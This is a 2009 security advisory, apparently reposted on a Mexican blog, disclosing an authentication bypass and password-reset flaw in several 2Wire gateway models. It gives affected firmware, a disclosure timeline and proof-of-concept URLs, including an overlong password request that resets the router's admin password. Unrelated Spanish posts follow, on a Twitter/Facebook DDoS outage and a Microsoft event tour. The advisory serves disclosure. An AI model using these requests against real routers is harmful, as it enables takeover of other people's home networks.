2WIRE GATEWAY AUTHENTICATION BYPASS & PASSWORD RESET

DESCRIPTION

—————–
There is an authentication bypass vulnerability in page=CD35_SETUP_01 that
allows you to set a new password even if the password was previously set.
By setting a new password with more than 512 characters the password gets
reset and next time you access the router you will be prompted for a new

password.
VULNERABLE
—————-
2Wire 2071 Gateway
2Wire 1800HW

2Wire 1701HG
Firmware
5.29.51
3.17.5
3.7.1

NOT VULNERABLE
——————–
Firmware
5.29.135.5 or later
DISCLOSURE TIMELINE

————————-
03/27/2009 – 2wire Contacted no satisfactory response
07/11/2009 – Sent complete details to 2wire no response
07/17/2009 – Sent advisory with video demo to 2wire ticket status escalated, but no response
08/02/2009 – Made public @ Defcon 17

EXPLOIT/POC
—————–
Authentication Bypass – just use this page to set a new password
http://gateway.2wire.net?xslt?page=CD35_SETUP_01

Video: http://www.hakim.ws/2wire/2wire_CD35_Bypass.ogv
Password Reset – using the same form but sending a password > 512 characters
http://gateway.2wire.net/xslt?PAGE=CD35_SETUP_01_POST&password1=hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkh
kmhkmhkmhkmhkmhkmhkmhkm&password2=hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkhkmhkmhkmhkmhkmhkmhkmhkm

Video: http://www.hakim.ws/2wire/2wire_CD35_Reset.ogv

GREETS
————
sdc lightos pcp nitr0us 0xf alt3kx darko DeadSector Etal gwolf h4ckult1m4t3
hackerss hd k00l kaz Kbrown mendozaaaa nahual Napa nediam raza-mexicana roa
Setting sla.ckers thornmaker tr3w vandida vi0let xianur0 Yield

Comunidad Underground de Mexico : https://www.underground.org.mx
h k m
http://www.hakim.ws
milw0rm.com [2009-08-12]

Facebook y Twitter, fuera de servicio por un ataque

Millones de cibernautas alrededor del mundo trataron inútilmente de entrar a los sitios de las redes sociales de Twtter y Facebook, debido a una falla que presentan ambos portales.

Los sitios fueron objeto de un ataque del dipo DDOS (Distribuited Denial Of Service Attack, por sus siglas en inglés) o Ataque de Denegación del Servicio Distribuido.

El ataque, que inicio alrededor de las 8:00 horas y concluyó a las 9:55, es considerado uno de los más serios registrados hasta ahora por Twitter y ha evidenciado la popularidad de la red al interrumpir el servicio a millones de usuarios.

Algunos blogueros informan que Twitter alertó del ataque a los usuarios y que minutos antes de salir de la red publicó que se estaban defiendiendo del ataque y que esperaban regresar el servicio en breve.

Desde entonces se ha paralizado el servicio y funciona de manera intermitente en ambos casos.

Con este tipo de ataques, los “hackers” suelen ralentizar o anular el acceso a una red con la técnica de sobrecargar el tráfico hacia ella hasta saturar su ancho de banda.

“En la que de otra forma sería una feliz mañana de jueves, Twitter es objeto de un ataque de denegación de servicio” , reconocía también el responsable ejecutivo de la red, Biz Stone, en otro blog de la red.

“Ataques como estos son maliciosos esfuerzos orquestados para desarticular y deshabilitar servicios como los de la banca online, sistemas de pago con tarjeta y en este caso Twitter. Ahora nos estamos defendiendo de este ataque e iremos actualizando nuestro blog y más tarde investigaremos”.

PCMag.com, entre otros medios de comunicación electrónicos, también informó hoy que hacia la misma hora se registraron problemas de acceso aFacebook, a lo que la red social contestó a través de un comunicado que está investigando lo ocurrido

Tech-days 2009 en tu ciudad

Arranco la gira para desarrolladores y profesionales de tecnología ya
arranco, participa y podrás aprende de las últimas tecnologías y
tendrás la oportunidad de platicar con expertos en la plataforma de
Microsoft México que te podrán apoyar con tus dudas y/o platicar
aspectos de negocio.

Mañana sera en Cancun

Ciudad

Fecha

Desarrolladores

Profesionales de Infraestructura

Diseñadores Web

Cancún

6 de Agosto

Regístrate

Regístrate

Regístrate

Fiesta Americana Condesa

Salón Gran Península


Blvd. Kukulcán Km. 16.5

Cancun

Quintana Roo

Mexico